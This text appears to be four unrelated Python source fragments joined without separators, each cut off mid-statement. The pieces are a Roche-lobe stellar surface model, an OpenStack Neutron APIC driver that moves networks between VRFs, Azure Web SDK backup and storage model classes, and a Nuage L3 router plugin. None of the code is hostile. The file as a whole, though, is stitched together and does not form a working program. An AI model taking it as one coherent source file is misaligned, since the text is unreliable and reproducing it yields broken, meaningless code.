(mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 ) # The cosine of x,y,z for the center of the faces. shape = n_faces, 3 self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T return def Radius(self): """Radius() Returns the volume-averaged radius of the star, in units of orbital separation. >>> self.Radius() """ return (self.rc**3).mean()**(1./3) def Roche(self): """Roche() Returns the volume-averaged Roche lobe radius of the star in units of orbital separation. For the geodesic tessellation, the volume-averaged Roche-lobe radius is easilly found since each surface element subtend the same solid angle. Therefore, the volume-averaged radius is the cubic root of the average values of the radii cubed <rc^3>^1/3. >>> self.Roche() """ filling = self.filling self.Make_surface(filling=1.) radius = self.Radius() self.Make_surface(filling=filling) return radius def _Surface(self, debug=False): """_Surface(debug=False) Calculates the surface grid values of surface gravity and surface element area by solving the potential equation. debug (False): Print debug information when True. >>> self._Surface() """ logger.log(9, "start") if debug: print( 'Begin _Surface()' ) ## Calculate some quantities self._Calc_qp1by2om2() ## Saddle point, i.e. the Roche-lobe radius at L1 (on the near side) xl1 = self._Saddle(0.5) self.L1 = xl1 if debug: print( 'Saddle %f' %xl1 ) ## Potential at the saddle point, L1 psil1 = self._Potential(xl1, 0., 0.)[-1] if debug: print( 'Potential psil1 %f' %psil1 ) ## rc_l1 is the stellar radius on the near side, i.e. the nose of the star self.rc_l1 = self.filling*xl1 if debug: print( 'rc_l1 %f' %self.rc_l1 ) ## Potential at rc_l1, the nose of the star trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi0 = self._Potential(self.rc_l1, 0., 0.) self.psi0 = psi0 if debug: print( 'Potential psi0\n trc: %f, trx %f, dpsi %f, dpsidx %f, dpsidy %f, dpsidz %f, psi0 %f' % (trc, trx, dpsi, dpsidx, dpsidy, dpsidz, self.psi0) ) ## rc_pole is stellar radius at 90 degrees, i.e. at the pole, which is perpendicular to the line separating the two stars and the orbital plane if debug: print( 'psi0,r '+str(self.psi0)+' '+str(r) ) self.rc_pole = self._Radius(0.,0.,1.,self.psi0,self.rc_l1) trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,0.,self.rc_pole) ## log surface gravity at the pole of the star self.logg_pole = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2)) ## rc_eq is stellar radius at 90 degrees in the orbital plane, i.e. at the equator, but not in the direction of the companion self.rc_eq = self._Radius(0.,1.,0.,self.psi0,self.rc_l1) trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,self.rc_eq,0.) ## log surface gravity at the pole of the star self.logg_eq = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2)) ## r_vertices are the radii of the vertices. shape = n_vertices self.r_vertices = self._Radius(self.vertices[:,0], self.vertices[:,1], self.vertices[:,2], self.psi0, self.rc_l1) ### Calculate useful quantities for all surface elements ## rc corresponds to r1 from Tjemkes et al., the distance from the center of mass of the pulsar companion. shape = n_faces self.rc = self._Radius(self.cosx, self.cosy, self.cosz, self.psi0, self.rc_l1) ## rx corresponds to r2 from Tjemkes et al., the distance from the center of mass of the pulsar. shape = n_faces trc, self.rx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(self.rc*self.cosx,self.rc*self.cosy,self.rc*self.cosz) ## log surface gravity. shape = n_faces geff = self._Geff(dpsidx, dpsidy, dpsidz) self.logg = np.log10(geff) ## gradient of the gravitational potential in x,y,z. shape = n_faces self.gradx = -dpsidx/geff self.grady = -dpsidy/geff self.gradz = -dpsidz/geff ## coschi is the cosine angle between
"'%(net_name)s' in project %(net_tenant)s with VRF %(vrf)s", {'net_id': network_db.id, 'net_name': network_db.name, 'net_tenant': network_db.tenant_id, 'vrf': new_vrf}) # NOTE: Must only be called for networks that are not yet # attached to any router. session = aim_ctx.db_session old_tenant_name = self.name_mapper.project( session, network_db.tenant_id) if (new_vrf.tenant_name != COMMON_TENANT_NAME and old_tenant_name != new_vrf.tenant_name): # Move BD and EPG to new VRF's Tenant, set VRF, and make # sure routing is enabled. LOG.debug("Moving network from tenant %(old)s to tenant %(new)s", {'old': old_tenant_name, 'new': new_vrf.tenant_name}) bd, epg = self._map_network(session, network_db, None) bd = self.aim.get(aim_ctx, bd) self.aim.delete(aim_ctx, bd) bd.tenant_name = new_vrf.tenant_name bd.enable_routing = True bd.vrf_name = new_vrf.name bd = self.aim.create(aim_ctx, bd) epg = self.aim.get(aim_ctx, epg) self.aim.delete(aim_ctx, epg) # ensure app profile exists in destination tenant ap = aim_resource.ApplicationProfile( tenant_name=new_vrf.tenant_name, name=self.ap_name) if not self.aim.get(aim_ctx, ap): self.aim.create(aim_ctx, ap) epg.tenant_name = new_vrf.tenant_name epg = self.aim.create(aim_ctx, epg) else: # Just set VRF and enable routing. bd, epg = self._map_network(session, network_db, new_vrf) bd = self.aim.update(aim_ctx, bd, enable_routing=True, vrf_name=new_vrf.name) # All non-router ports on this network need to be notified # since their BD's VRF and possibly their BD's and EPG's # Tenants have changed. nets_to_notify.add(network_db.id) return bd, epg def _dissassociate_network_from_vrf(self, aim_ctx, network_db, old_vrf, nets_to_notify): LOG.debug("Dissassociating network %(net_id)s named '%(net_name)s' in " "project %(net_tenant)s from VRF %(vrf)s", {'net_id': network_db.id, 'net_name': network_db.name, 'net_tenant': network_db.tenant_id, 'vrf': old_vrf}) session = aim_ctx.db_session bd, epg = self._map_network(session, network_db, old_vrf) new_vrf = self._map_unrouted_vrf() new_tenant_name = self.name_mapper.project( session, network_db.tenant_id) # REVISIT(rkukura): Share code with _associate_network_with_vrf? if (old_vrf.tenant_name != COMMON_TENANT_NAME and old_vrf.tenant_name != new_tenant_name): # Move BD and EPG to network's Tenant, set unrouted VRF, # and disable routing. LOG.debug("Moving network from tenant %(old)s to tenant %(new)s", {'old': old_vrf.tenant_name, 'new': new_tenant_name}) bd = self.aim.get(aim_ctx, bd) self.aim.delete(aim_ctx, bd) bd.tenant_name = new_tenant_name bd.enable_routing = False bd.vrf_name = new_vrf.name bd = self.aim.create(aim_ctx, bd) epg = self.aim.get(aim_ctx, epg) self.aim.delete(aim_ctx, epg) epg.tenant_name = new_tenant_name epg = self.aim.create(aim_ctx, epg) else: # Just set unrouted VRF and disable routing. bd = self.aim.update(aim_ctx, bd, enable_routing=False, vrf_name=new_vrf.name) # All non-router ports on this network need to be notified # since their BD's VRF and possibly their BD's and EPG's # Tenants have changed. nets_to_notify.add(network_db.id) def _move_topology(self, aim_ctx, topology, old_vrf, new_vrf, nets_to_notify): LOG.info(_LI("Moving routed networks %(topology)s from VRF " "%(old_vrf)s to VRF %(new_vrf)s"), {'topology': topology.keys(), 'old_vrf': old_vrf, 'new_vrf': new_vrf}) # TODO(rkukura): Validate that nothing in new_vrf overlaps # with topology. session = aim_ctx.db_session for network_db in topology.itervalues(): if old_vrf.tenant_name != new_vrf.tenant_name: # New VRF is in different Tenant, so move BD, EPG, and # all Subnets to new VRF's Tenant and set BD's VRF. LOG.debug("Moving network %(net)s from tenant %(old)s to " "tenant %(new)s", {'net': network_db.id, 'old': old_vrf.tenant_name, 'new': new_vrf.tenant_name}) bd, epg = self._map_network(session, network_db, old_vrf) old_bd = self.aim.get(aim_ctx, bd) new_bd = copy.copy(old_bd) new_bd.tenant_name = new_vrf.tenant_name new_bd.vrf_name = new_vrf.name bd = self.aim.create(aim_ctx, new_bd) for subnet in self.aim.find( aim_ctx, aim_resource.Subnet, tenant_name=old_bd.tenant_name, bd_name=old_bd.name): self.aim.delete(aim_ctx, subnet) subnet.tenant_name = bd.tenant_name subnet = self.aim.create(aim_ctx, subnet) self.aim.delete(aim_ctx, old_bd) epg = self.aim.get(aim_ctx, epg) self.aim.delete(aim_ctx, epg) epg.tenant_name = new_vrf.tenant_name epg = self.aim.create(aim_ctx, epg) else: # New VRF is in same Tenant, so just set BD's VRF. bd, _ = self._map_network(session, network_db, new_vrf) bd = self.aim.update(aim_ctx, bd, vrf_name=new_vrf.name) # All non-router ports on all networks in topology need to be # notified since their BDs' VRFs and possibly their BDs' and # EPGs' Tenants have changed. nets_to_notify.update(topology.keys()) def _router_topology(self, session, router_id): LOG.debug("Getting topology for router %s", router_id) visited_networks = {} visited_router_ids = set() self._expand_topology_for_routers( session, visited_networks, visited_router_ids, [router_id]) LOG.debug("Returning router topology %s", visited_networks) return visited_networks def _network_topology(self, session, network_db): LOG.debug("Getting topology for network %s", network_db.id) visited_networks = {} visited_router_ids = set() self._expand_topology_for_networks( session, visited_networks, visited_router_ids, [network_db]) LOG.debug("Returning network topology %s", visited_networks) return visited_networks def _expand_topology_for_routers(self, session, visited_networks, visited_router_ids, new_router_ids): LOG.debug("Adding routers %s to topology", new_router_ids) added_ids = set(new_router_ids) - visited_router_ids if added_ids: visited_router_ids |= added_ids LOG.debug("Querying for networks interfaced to routers %s", added_ids) query = (session.query(models_v2.Network). join(models_v2.Port). join(l3_db.RouterPort). filter(l3_db.RouterPort.router_id.in_(added_ids))) if visited_networks: query = query.filter( ~models_v2.Network.id.in_(visited_networks.keys())) results = (query.filter(l3_db.RouterPort.port_type == n_constants.DEVICE_OWNER_ROUTER_INTF). distinct(). all()) self._expand_topology_for_networks( session, visited_networks, visited_router_ids, results) def _expand_topology_for_networks(self, session, visited_networks, visited_router_ids, new_networks): LOG.debug("Adding networks %s to topology", [net.id for net in new_networks]) added_ids = [] for net in new_networks: if net.id not in visited_networks: visited_networks[net.id] = net added_ids.append(net.id) if added_ids: LOG.debug("Querying for routers interfaced to networks %s", added_ids) query = (session.query(l3_db.RouterPort.router_id). join(models_v2.Port). filter(models_v2.Port.network_id.in_(added_ids))) if visited_router_ids: query = query.filter( ~l3_db.RouterPort.router_id.in_(visited_router_ids)) results = (query.filter(l3_db.RouterPort.port_type == n_constants.DEVICE_OWNER_ROUTER_INTF). distinct(). all()) self._expand_topology_for_routers( session, visited_networks, visited_router_ids, [result[0] for result in results]) def _topology_shared(self, topology): for network_db in topology.values(): for entry in network_db.rbac_entries: # Access is enforced by Neutron itself, and we only # care whether or not the network is shared, so we # ignore the entry's target_tenant. if entry.action == rbac_db_models.ACCESS_SHARED: return network_db def _ip_for_subnet(self, subnet, fixed_ips): subnet_id = subnet['id'] for fixed_ip in fixed_ips: if fixed_ip['subnet_id'] == subnet_id: return fixed_ip['ip_address'] def _subnet_router_ips(self, session, subnet_id): return (session.query(models_v2.IPAllocation.ip_address, l3_db.RouterPort.router_id). join(models_v2.Port). filter( models_v2.IPAllocation.subnet_id == subnet_id, l3_db.RouterPort.port_type == n_constants.DEVICE_OWNER_ROUTER_INTF )) def _scope_by_id(self, session, scope_id): return (session.query(address_scope_db.AddressScope). filter_by(id=scope_id). one()) def _map_network(self, session, network, vrf, bd_only=False): tenant_aname = (vrf.tenant_name if vrf and vrf.tenant_name != COMMON_TENANT_NAME else self.name_mapper.project( session, network['tenant_id'])) id = network['id'] aname = self.name_mapper.network(session, id) bd = aim_resource.BridgeDomain(tenant_name=tenant_aname, name=aname) if bd_only: return bd epg = aim_resource.EndpointGroup(tenant_name=tenant_aname, app_profile_name=self.ap_name, name=aname) return bd, epg def _map_external_network(self, session, network): l3out, ext_net, ns = self._get_aim_nat_strategy(network) if ext_net: aim_ctx = aim_context.AimContext(db_session=session) for o in (ns.get_l3outside_resources(aim_ctx, l3out) or []): if isinstance(o, aim_resource.EndpointGroup): return o def _map_subnet(self, subnet, gw_ip, bd): prefix_len = subnet['cidr'].split('/')[1] gw_ip_mask = gw_ip + '/' + prefix_len sn = aim_resource.Subnet(tenant_name=bd.tenant_name, bd_name=bd.name, gw_ip_mask=gw_ip_mask) return sn def _map_address_scope(self, session, scope): id = scope['id'] extn_db = extension_db.ExtensionDbMixin() scope_extn = extn_db.get_address_scope_extn_db(session, id) if scope_extn and scope_extn.get(cisco_apic.VRF): vrf = aim_resource.VRF.from_dn(scope_extn[cisco_apic.VRF]) else: tenant_aname = self.name_mapper.project( session, scope['tenant_id']) aname = self.name_mapper.address_scope(session, id) vrf = aim_resource.VRF(tenant_name=tenant_aname, name=aname) return vrf def _map_router(self, session, router, contract_only=False): id = router['id'] aname = self.name_mapper.router(session, id) contract = aim_resource.Contract(tenant_name=COMMON_TENANT_NAME, name=aname) if contract_only: return contract subject = aim_resource.ContractSubject(tenant_name=COMMON_TENANT_NAME, contract_name=aname, name=ROUTER_SUBJECT_NAME) return contract, subject def _map_default_vrf(self, session, network): tenant_aname = self.name_mapper.project(session, network['tenant_id']) vrf = aim_resource.VRF(tenant_name=tenant_aname, name=DEFAULT_VRF_NAME) return vrf def _map_unrouted_vrf(self): vrf = aim_resource.VRF( tenant_name=COMMON_TENANT_NAME, name=self.apic_system_id + '_' + UNROUTED_VRF_NAME) return vrf def _ensure_common_tenant(self, aim_ctx): attrs = aim_resource.Tenant(name=COMMON_TENANT_NAME, display_name=aim_utils.sanitize_display_name('CommonTenant')) tenant = self.aim.get(aim_ctx, attrs) if not tenant: LOG.info(_LI("Creating common tenant")) tenant = self.aim.create(aim_ctx, attrs) return tenant def _ensure_unrouted_vrf(self, aim_ctx): self._ensure_common_tenant(aim_ctx) attrs = self._map_unrouted_vrf() vrf = self.aim.get(aim_ctx, attrs) if not vrf: attrs.display_name = ( aim_utils.sanitize_display_name('CommonUnroutedVRF')) LOG.info(_LI("Creating common unrouted VRF")) vrf = self.aim.create(aim_ctx, attrs) return vrf def _ensure_any_filter(self, aim_ctx): self._ensure_common_tenant(aim_ctx) filter_name = self.apic_system_id + '_' + ANY_FILTER_NAME dname = aim_utils.sanitize_display_name("AnyFilter") filter = aim_resource.Filter(tenant_name=COMMON_TENANT_NAME, name=filter_name, display_name=dname) if not self.aim.get(aim_ctx, filter): LOG.info(_LI("Creating common Any Filter")) self.aim.create(aim_ctx, filter) dname = aim_utils.sanitize_display_name("AnyFilterEntry") entry = aim_resource.FilterEntry(tenant_name=COMMON_TENANT_NAME, filter_name=filter_name, name=ANY_FILTER_ENTRY_NAME, display_name=dname) if not self.aim.get(aim_ctx, entry): LOG.info(_LI("Creating common Any FilterEntry")) self.aim.create(aim_ctx, entry) return filter def _ensure_default_vrf(self, aim_ctx, attrs): vrf = self.aim.get(aim_ctx, attrs) if not vrf: attrs.display_name = ( aim_utils.sanitize_display_name('DefaultRoutedVRF')) LOG.info(_LI("Creating default VRF for %s"), attrs.tenant_name) vrf = self.aim.create(aim_ctx, attrs) return vrf def _get_epg_for_network(self, session, network): if self._is_external(network): return self._map_external_network(session, network) # REVISIT(rkukura): Can the network_db be passed in? network_db = (session.query(models_v2.Network). filter_by(id=network['id']). one()) vrf = self._get_routed_vrf_for_network(session, network_db) return self._map_network(session, network_db, vrf)[1] # DB Configuration callbacks def _set_enable_metadata_opt(self, new_conf): self.enable_metadata_opt = new_conf['value'] def _set_enable_dhcp_opt(self, new_conf): self.enable_dhcp_opt = new_conf['value'] def _set_ap_name(self, new_conf): self.ap_name = new_conf['value'] def get_aim_domains(self, aim_ctx): vmms = [x.name for x in self.aim.find(aim_ctx, aim_resource.VMMDomain) if x.type == utils.OPENSTACK_VMM_TYPE] phys = [x.name for x in self.aim.find(aim_ctx, aim_resource.PhysicalDomain)] return vmms, phys def _is_external(self, network): return network.get('router:external') def _nat_type_to_strategy(self, nat_type): ns_cls = nat_strategy.DistributedNatStrategy if nat_type == '': ns_cls = nat_strategy.NoNatStrategy elif nat_type == 'edge': ns_cls = nat_strategy.EdgeNatStrategy ns = ns_cls(self.aim) ns.app_profile_name = self.ap_name return ns def _get_aim_nat_strategy(self, network): if not self._is_external(network): return None, None, None ext_net_dn = (network.get(cisco_apic.DIST_NAMES, {}) .get(cisco_apic.EXTERNAL_NETWORK)) if not ext_net_dn: return None, None, None nat_type = network.get(cisco_apic.NAT_TYPE) aim_ext_net = aim_resource.ExternalNetwork.from_dn(ext_net_dn) aim_l3out = aim_resource.L3Outside( tenant_name=aim_ext_net.tenant_name, name=aim_ext_net.l3out_name) return aim_l3out, aim_ext_net, self._nat_type_to_strategy(nat_type) def _get_aim_nat_strategy_db(self, session, network_db): if network_db.external is not None: extn_db = extension_db.ExtensionDbMixin() extn_info = extn_db.get_network_extn_db(session, network_db.id) if extn_info and cisco_apic.EXTERNAL_NETWORK in extn_info: dn
int :param enabled: True if configuration is enabled, false if it is disabled and null if configuration is not set. :type enabled: bool """ _attribute_map = { 'sas_url': {'key': 'sasUrl', 'type': 'str'}, 'retention_in_days': {'key': 'retentionInDays', 'type': 'int'}, 'enabled': {'key': 'enabled', 'type': 'bool'}, } def __init__( self, *, sas_url: Optional[str] = None, retention_in_days: Optional[int] = None, enabled: Optional[bool] = None, **kwargs ): super(AzureBlobStorageHttpLogsConfig, self).__init__(**kwargs) self.sas_url = sas_url self.retention_in_days = retention_in_days self.enabled = enabled class AzureStorageInfoValue(msrest.serialization.Model): """Azure Files or Blob Storage access information value for dictionary storage. Variables are only populated by the server, and will be ignored when sending a request. :param type: Type of storage. Possible values include: "AzureFiles", "AzureBlob". :type type: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageType :param account_name: Name of the storage account. :type account_name: str :param share_name: Name of the file share (container name, for Blob storage). :type share_name: str :param access_key: Access key for the storage account. :type access_key: str :param mount_path: Path to mount the storage within the site's runtime environment. :type mount_path: str :ivar state: State of the storage account. Possible values include: "Ok", "InvalidCredentials", "InvalidShare". :vartype state: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageState """ _validation = { 'state': {'readonly': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'account_name': {'key': 'accountName', 'type': 'str'}, 'share_name': {'key': 'shareName', 'type': 'str'}, 'access_key': {'key': 'accessKey', 'type': 'str'}, 'mount_path': {'key': 'mountPath', 'type': 'str'}, 'state': {'key': 'state', 'type': 'str'}, } def __init__( self, *, type: Optional[Union[str, "AzureStorageType"]] = None, account_name: Optional[str] = None, share_name: Optional[str] = None, access_key: Optional[str] = None, mount_path: Optional[str] = None, **kwargs ): super(AzureStorageInfoValue, self).__init__(**kwargs) self.type = type self.account_name = account_name self.share_name = share_name self.access_key = access_key self.mount_path = mount_path self.state = None class AzureStoragePropertyDictionaryResource(ProxyOnlyResource): """AzureStorageInfo dictionary resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Resource Id. :vartype id: str :ivar name: Resource Name. :vartype name: str :param kind: Kind of resource. :type kind: str :ivar type: Resource type. :vartype type: str :param properties: Azure storage accounts. :type properties: dict[str, ~azure.mgmt.web.v2020_06_01.models.AzureStorageInfoValue] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'kind': {'key': 'kind', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'properties': {'key': 'properties', 'type': '{AzureStorageInfoValue}'}, } def __init__( self, *, kind: Optional[str] = None, properties: Optional[Dict[str, "AzureStorageInfoValue"]] = None, **kwargs ): super(AzureStoragePropertyDictionaryResource, self).__init__(kind=kind, **kwargs) self.properties = properties class AzureTableStorageApplicationLogsConfig(msrest.serialization.Model): """Application logs to Azure table storage configuration. All required parameters must be populated in order to send to Azure. :param level: Log level. Possible values include: "Off", "Verbose", "Information", "Warning", "Error". :type level: str or ~azure.mgmt.web.v2020_06_01.models.LogLevel :param sas_url: Required. SAS URL to an Azure table with add/query/delete permissions. :type sas_url: str """ _validation = { 'sas_url': {'required': True}, } _attribute_map = { 'level': {'key': 'level', 'type': 'str'}, 'sas_url': {'key': 'sasUrl', 'type': 'str'}, } def __init__( self, *, sas_url: str, level: Optional[Union[str, "LogLevel"]] = None, **kwargs ): super(AzureTableStorageApplicationLogsConfig, self).__init__(**kwargs) self.level = level self.sas_url = sas_url class BackupItem(ProxyOnlyResource): """Backup description. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Resource Id. :vartype id: str :ivar name: Resource Name. :vartype name: str :param kind: Kind of resource. :type kind: str :ivar type: Resource type. :vartype type: str :ivar backup_id: Id of the backup. :vartype backup_id: int :ivar storage_account_url: SAS URL for the storage account container which contains this backup. :vartype storage_account_url: str :ivar blob_name: Name of the blob which contains data for this backup. :vartype blob_name: str :ivar name_properties_name: Name of this backup. :vartype name_properties_name: str :ivar status: Backup status. Possible values include: "InProgress", "Failed", "Succeeded", "TimedOut", "Created", "Skipped", "PartiallySucceeded", "DeleteInProgress", "DeleteFailed", "Deleted". :vartype status: str or ~azure.mgmt.web.v2020_06_01.models.BackupItemStatus :ivar size_in_bytes: Size of the backup in bytes. :vartype size_in_bytes: long :ivar created: Timestamp of the backup creation. :vartype created: ~datetime.datetime :ivar log: Details regarding this backup. Might contain an error message. :vartype log: str :ivar databases: List of databases included in the backup. :vartype databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting] :ivar scheduled: True if this backup has been created due to a schedule being triggered. :vartype scheduled: bool :ivar last_restore_time_stamp: Timestamp of a last restore operation which used this backup. :vartype last_restore_time_stamp: ~datetime.datetime :ivar finished_time_stamp: Timestamp when this backup finished. :vartype finished_time_stamp: ~datetime.datetime :ivar correlation_id: Unique correlation identifier. Please use this along with the timestamp while communicating with Azure support. :vartype correlation_id: str :ivar website_size_in_bytes: Size of the original web app which has been backed up. :vartype website_size_in_bytes: long """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'backup_id': {'readonly': True}, 'storage_account_url': {'readonly': True}, 'blob_name': {'readonly': True}, 'name_properties_name': {'readonly': True}, 'status': {'readonly': True}, 'size_in_bytes': {'readonly': True}, 'created': {'readonly': True}, 'log': {'readonly': True}, 'databases': {'readonly': True}, 'scheduled': {'readonly': True}, 'last_restore_time_stamp': {'readonly': True}, 'finished_time_stamp': {'readonly': True}, 'correlation_id': {'readonly': True}, 'website_size_in_bytes': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'kind': {'key': 'kind', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'backup_id': {'key': 'properties.id', 'type': 'int'}, 'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'}, 'blob_name': {'key': 'properties.blobName', 'type': 'str'}, 'name_properties_name': {'key': 'properties.name', 'type': 'str'}, 'status': {'key': 'properties.status', 'type': 'str'}, 'size_in_bytes': {'key': 'properties.sizeInBytes', 'type': 'long'}, 'created': {'key': 'properties.created', 'type': 'iso-8601'}, 'log': {'key': 'properties.log', 'type': 'str'}, 'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'}, 'scheduled': {'key': 'properties.scheduled', 'type': 'bool'}, 'last_restore_time_stamp': {'key': 'properties.lastRestoreTimeStamp', 'type': 'iso-8601'}, 'finished_time_stamp': {'key': 'properties.finishedTimeStamp', 'type': 'iso-8601'}, 'correlation_id': {'key': 'properties.correlationId', 'type': 'str'}, 'website_size_in_bytes': {'key': 'properties.websiteSizeInBytes', 'type': 'long'}, } def __init__( self, *, kind: Optional[str] = None, **kwargs ): super(BackupItem, self).__init__(kind=kind, **kwargs) self.backup_id = None self.storage_account_url = None self.blob_name = None self.name_properties_name = None self.status = None self.size_in_bytes = None self.created = None self.log = None self.databases = None self.scheduled = None self.last_restore_time_stamp = None self.finished_time_stamp = None self.correlation_id = None self.website_size_in_bytes = None class BackupItemCollection(msrest.serialization.Model): """Collection of backup items. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :param value: Required. Collection of resources. :type value: list[~azure.mgmt.web.v2020_06_01.models.BackupItem] :ivar next_link: Link to next page of resources. :vartype next_link: str """ _validation = { 'value': {'required': True}, 'next_link': {'readonly': True}, } _attribute_map = { 'value': {'key': 'value', 'type': '[BackupItem]'}, 'next_link': {'key': 'nextLink', 'type': 'str'}, } def __init__( self, *, value: List["BackupItem"], **kwargs ): super(BackupItemCollection, self).__init__(**kwargs) self.value = value self.next_link = None class BackupRequest(ProxyOnlyResource): """Description of a backup which will be performed. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Resource Id. :vartype id: str :ivar name: Resource Name. :vartype name: str :param kind: Kind of resource. :type kind: str :ivar type: Resource type. :vartype type: str :param backup_name: Name of the backup. :type backup_name: str :param enabled: True if the backup schedule is enabled (must be included in that case), false if the backup schedule should be disabled. :type enabled: bool :param storage_account_url: SAS URL to the container. :type storage_account_url: str :param backup_schedule: Schedule for the backup if it is executed periodically. :type backup_schedule: ~azure.mgmt.web.v2020_06_01.models.BackupSchedule :param databases: Databases included in the backup. :type databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'kind': {'key': 'kind', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'backup_name': {'key': 'properties.backupName', 'type': 'str'}, 'enabled': {'key': 'properties.enabled', 'type': 'bool'}, 'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'}, 'backup_schedule': {'key': 'properties.backupSchedule', 'type': 'BackupSchedule'}, 'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'}, } def __init__( self, *, kind: Optional[str] = None, backup_name: Optional[str] = None, enabled: Optional[bool] = None, storage_account_url: Optional[str] = None, backup_schedule: Optional["BackupSchedule"] = None, databases: Optional[List["DatabaseBackupSetting"]] = None, **kwargs ): super(BackupRequest, self).__init__(kind=kind, **kwargs) self.backup_name = backup_name self.enabled = enabled self.storage_account_url = storage_account_url self.backup_schedule = backup_schedule self.databases = databases class BackupSchedule(msrest.serialization.Model): """Description of a backup schedule. Describes how often should be the backup performed and what should
= ipv6_dhcp_ip = None if dhcp_port: on_exc(self.delete_dhcp_nuage_port_by_id, context, dhcp_port['id']) for fixed_ip in dhcp_port['fixed_ips']: if (ipv4_subnet and fixed_ip['subnet_id'] == ipv4_subnet['id']): ipv4_dhcp_ip = fixed_ip['ip_address'] if (ipv6_subnet and fixed_ip['subnet_id'] == ipv6_subnet['id']): ipv6_dhcp_ip = fixed_ip['ip_address'] self.vsdclient.confirm_router_interface_not_in_use(router_id, subnet) network = self.core_plugin.get_network(context, subnet['network_id']) subnet_mapping['network_name'] = network['name'] with session.begin(subtransactions=True): vsd_l2domain = ( self.vsdclient.create_l2domain_for_router_detach( ipv4_subnet, subnet_mapping, ipv6_subnet, ipv4_dhcp_ip, ipv6_dhcp_ip)) on_exc(self.vsdclient.delete_subnet, l2dom_id=vsd_l2domain['nuage_l2domain_id']) result = super(NuageL3Plugin, self).remove_router_interface(context, router_id, interface_info) self.set_mapping_as_l2domain(session, ipv4_subnet_mapping, ipv6_subnet_mapping, vsd_l2domain) self.vsdclient.move_l3subnet_to_l2domain( nuage_subn_id, vsd_l2domain['nuage_l2domain_id'], ipv4_subnet_mapping, subnet, ipv6_subnet_mapping ) self._notify_add_del_router_interface( constants.AFTER_DELETE, context=context, router_id=router_id, subnet_id=subnet_id, subnet_mapping=subnet_mapping) routing_mechanisms.delete_nuage_subnet_parameters(context, subnet_id) LOG.debug("Deleted nuage domain subnet %s", nuage_subn_id) return result @staticmethod def set_mapping_as_l3subnet(session, ipv4_subnet_mapping, ipv6_subnet_mapping, vsd_subnet): with session.begin(subtransactions=True): if ipv4_subnet_mapping: nuagedb.update_subnetl2dom_mapping( ipv4_subnet_mapping, {'nuage_subnet_id': vsd_subnet['ID'], 'nuage_l2dom_tmplt_id': None}) if ipv6_subnet_mapping: nuagedb.update_subnetl2dom_mapping( ipv6_subnet_mapping, {'nuage_subnet_id': vsd_subnet['ID'], 'nuage_l2dom_tmplt_id': None}) @nuage_utils.handle_nuage_api_error @lib_db_api.retry_if_session_inactive() @log_helpers.log_method_call def get_router(self, context, id, fields=None): router = super(NuageL3Plugin, self).get_router(context, id, fields) nuage_router = self.vsdclient.get_router_by_external(id) self._add_nuage_router_attributes(context.session, router, nuage_router) return self._fields(router, fields) @nuage_utils.handle_nuage_api_error @lib_db_api.retry_if_session_inactive() @log_helpers.log_method_call def get_routers(self, context, filters=None, fields=None, sorts=None, limit=None, marker=None, page_reverse=False): routers = super(NuageL3Plugin, self).get_routers(context, filters, fields, sorts, limit, marker, page_reverse) for router in routers: routing_mechanisms.add_nuage_router_attributes(context.session, router) self._fields(router, fields) return routers def _add_nuage_router_attributes(self, session, router, nuage_router): if not nuage_router: return ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid( session, router['id']) router['net_partition'] = ent_rtr_mapping['net_partition_id'] router['tunnel_type'] = nuage_router.get('tunnelType') router['rd'] = nuage_router.get('routeDistinguisher') router['rt'] = nuage_router.get('routeTarget') router['ecmp_count'] = nuage_router.get('ECMPCount') router['nuage_backhaul_vnid'] = nuage_router.get('backHaulVNID') router['nuage_backhaul_rd'] = (nuage_router.get( 'backHaulRouteDistinguisher')) router['nuage_backhaul_rt'] = nuage_router.get('backHaulRouteTarget') for route in router.get('routes', []): params = { 'address': route['destination'], 'nexthop': route['nexthop'], 'nuage_domain_id': nuage_router['ID'] } nuage_route = 